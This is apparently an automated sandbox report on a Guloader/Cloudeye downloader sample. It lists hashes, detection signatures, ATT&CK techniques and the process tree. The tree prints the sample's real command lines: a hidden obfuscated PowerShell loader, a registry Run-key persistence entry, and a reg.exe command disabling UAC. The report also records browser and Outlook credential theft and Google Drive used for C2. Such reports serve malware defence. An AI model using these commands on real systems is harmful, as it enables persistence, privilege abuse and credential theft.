Overview
overview
10Static
static
339f1703e13...a1.exe
windows7-x64
1039f1703e13...a1.exe
windows10-2004-x64
8$PLUGINSDI...ge.dll
windows7-x64
3$PLUGINSDI...ge.dll
windows10-2004-x64
3$PLUGINSDI...fo.dll
windows7-x64
3$PLUGINSDI...fo.dll
windows10-2004-x64
3$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-09-2024 01:20
Static task
static1
Behavioral task
behavioral1
Sample
39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
General
-
Target
39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
-
Size
458KB
-
MD5
61bdbe7854f1572202f7916cf7f03616
-
SHA1
e03a3385bc0cd5869c2a8cc72c80f4115b7b7945
-
SHA256
39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1
-
SHA512
b9b41ede8456e65669ddf068bd6d277d60a7f2d233fa947636f998e9f77bc9be72a4b27884c9cc1bb979bbc0a8488ba8efa32375258492eb712ed864eca3a9c6
-
SSDEEP
12288:rKYi/LYz3kRV6h/3lObHOjeP/AxozXkYD:GFDg3ZhvlwHWiYx2UYD
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/1588-226-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/896-224-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/1740-223-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/896-224-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/1740-223-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 10 IoCs
flow pid Process 5 1288 powershell.exe 7 1288 powershell.exe 9 1288 powershell.exe 11 1288 powershell.exe 13 1288 powershell.exe 15 1288 powershell.exe 16 1288 powershell.exe 17 1288 powershell.exe 19 1288 powershell.exe 20 1288 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1288 powershell.exe -
Loads dropped DLL 3 IoCs
pid Process 2260 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe 2260 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe 2260 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preferentialist = "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\\Corycia\\').mandskaber;%Therapeutic% ($Terrain)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1288 powershell.exe 1288 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1288 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1288 set thread context of 1740 1288 powershell.exe 42 PID 1288 set thread context of 896 1288 powershell.exe 43 PID 1288 set thread context of 1588 1288 powershell.exe 44 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1524 reg.exe 1756 reg.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 1740 powershell.exe 1740 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1288 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1288 powershell.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 2260 wrote to memory of 1288 2260 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe 30 PID 2260 wrote to memory of 1288 2260 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe 30 PID 2260 wrote to memory of 1288 2260 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe 30 PID 2260 wrote to memory of 1288 2260 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe 30 PID 1288 wrote to memory of 1780 1288 powershell.exe 35 PID 1288 wrote to memory of 1780 1288 powershell.exe 35 PID 1288 wrote to memory of 1780 1288 powershell.exe 35 PID 1288 wrote to memory of 1780 1288 powershell.exe 35 PID 1780 wrote to memory of 1756 1780 cmd.exe 37 PID 1780 wrote to memory of 1756 1780 cmd.exe 37 PID 1780 wrote to memory of 1756 1780 cmd.exe 37 PID 1780 wrote to memory of 1756 1780 cmd.exe 37 PID 1288 wrote to memory of 344 1288 powershell.exe 39 PID 1288 wrote to memory of 344 1288 powershell.exe 39 PID 1288 wrote to memory of 344 1288 powershell.exe 39 PID 1288 wrote to memory of 344 1288 powershell.exe 39 PID 344 wrote to memory of 1524 344 cmd.exe 41 PID 344 wrote to memory of 1524 344 cmd.exe 41 PID 344 wrote to memory of 1524 344 cmd.exe 41 PID 344 wrote to memory of 1524 344 cmd.exe 41 PID 1288 wrote to memory of 1740 1288 powershell.exe 42 PID 1288 wrote to memory of 1740 1288 powershell.exe 42 PID 1288 wrote to memory of 1740 1288 powershell.exe 42 PID 1288 wrote to memory of 1740 1288 powershell.exe 42 PID 1288 wrote to memory of 1740 1288 powershell.exe 42 PID 1288 wrote to memory of 896 1288 powershell.exe 43 PID 1288 wrote to memory of 896 1288 powershell.exe 43 PID 1288 wrote to memory of 896 1288 powershell.exe 43 PID 1288 wrote to memory of 896 1288 powershell.exe 43 PID 1288 wrote to memory of 896 1288 powershell.exe 43 PID 1288 wrote to memory of 1588 1288 powershell.exe 44 PID 1288 wrote to memory of 1588 1288 powershell.exe 44 PID 1288 wrote to memory of 1588 1288 powershell.exe 44 PID 1288 wrote to memory of 1588 1288 powershell.exe 44 PID 1288 wrote to memory of 1588 1288 powershell.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe"C:\Users\Admin\AppData\Local\Temp\39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1524
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\sbvrkjguwrakgvnadszsiqnfskeicmd"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\cvij"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:896
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\exnuluc"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
126B
MD55b96bfeb855724a4f7fac8c3d9eb19c5
SHA1ecf788355f1de37d7681d201718518059fd979bb
SHA2560b9e281bac88bd756557c3bc1d509e4db1fd3a411b9d480c0bcf48aee4eccfe8
SHA512b56efcb826306e1644fe032a9026f3b362d8451205a67614006bca67a930d57b7e8927705461fd3dd11ebfc41cf5c1639f66b651f87b5e2eff81faf83ab70ff7
-
Filesize
310KB
MD574c243e34b9fafdd090165d998591c37
SHA1376964338a52695316fad59455cd23269312cc21
SHA256ea92d267a29ebea630fc51e02b9e7c42683216b1b4bf1075063a58529657ab16
SHA5124670d7e9efe8d9738f9406e741991bf8e52de94eae4c202441e7c0457b4c120f6033893e4b1b1ddd69410ec3c39d8edf3c86905ca41a7aab1bd4b2fb9e06657c
-
Filesize
68KB
MD5e857291cf7cdcfd0413d85abdb01f724
SHA1f4c0728ba5a0e78bc19489425dfb634327cd664d
SHA2564df3727a11c8e633d68d7dfb08f7a679aea4b0cfcbda2d54da547499a9c66e16
SHA5121007e794c375819bf7e1011bc27077422fc40b3b8648f2aae98cdceba26e0c0944cc82bd6fe93b55b65a87c828b866aaf1260e588bb94d3088635e035ba71f30
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
1KB
MD5ee799ff3f19d8a939028343a8a815f6f
SHA1ff6cba4df1791c066510f1281ef4f84f347d7864
SHA256d7acb2a5964370970193b9d9f1ba3a21929831624c0e096021a6b544fc882e20
SHA512353c801e468ca8e6435d4f76f455237cf3ace04b9c7d513b4b751b46a55551b367592aeeb88daa9847a1c4da240d7e720934368c03752d8b976650b5ba1c6c85
-
Filesize
7KB
MD5350a507070ed063ac6a511aeef67861a
SHA1cf647b90a1212e090f1d236d1b50a5010cbf3bae
SHA2565c66abd3f06eaa357ed9663224c927cf7120dca010572103faa88832bb31c5ab
SHA512cde5747cc8539625e4262afad9699ce4e8325133d7ed7f47b9d46989a7aa0d2cc2488441acc57368f485ef1dd3e02b9ef2faa642f68e9f1db53a39e0f896d468
-
Filesize
9KB
MD513b6a88cf284d0f45619e76191e2b995
SHA109ebb0eb4b1dca73d354368414906fc5ad667e06
SHA256cb958e21c3935ef7697a2f14d64cae0f9264c91a92d2deeb821ba58852dac911
SHA5122aeeae709d759e34592d8a06c90e58aa747e14d54be95fb133994fdcebb1bdc8bc5d82782d0c8c3cdfd35c7bea5d7105379d3c3a25377a8c958c7b2555b1209e
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2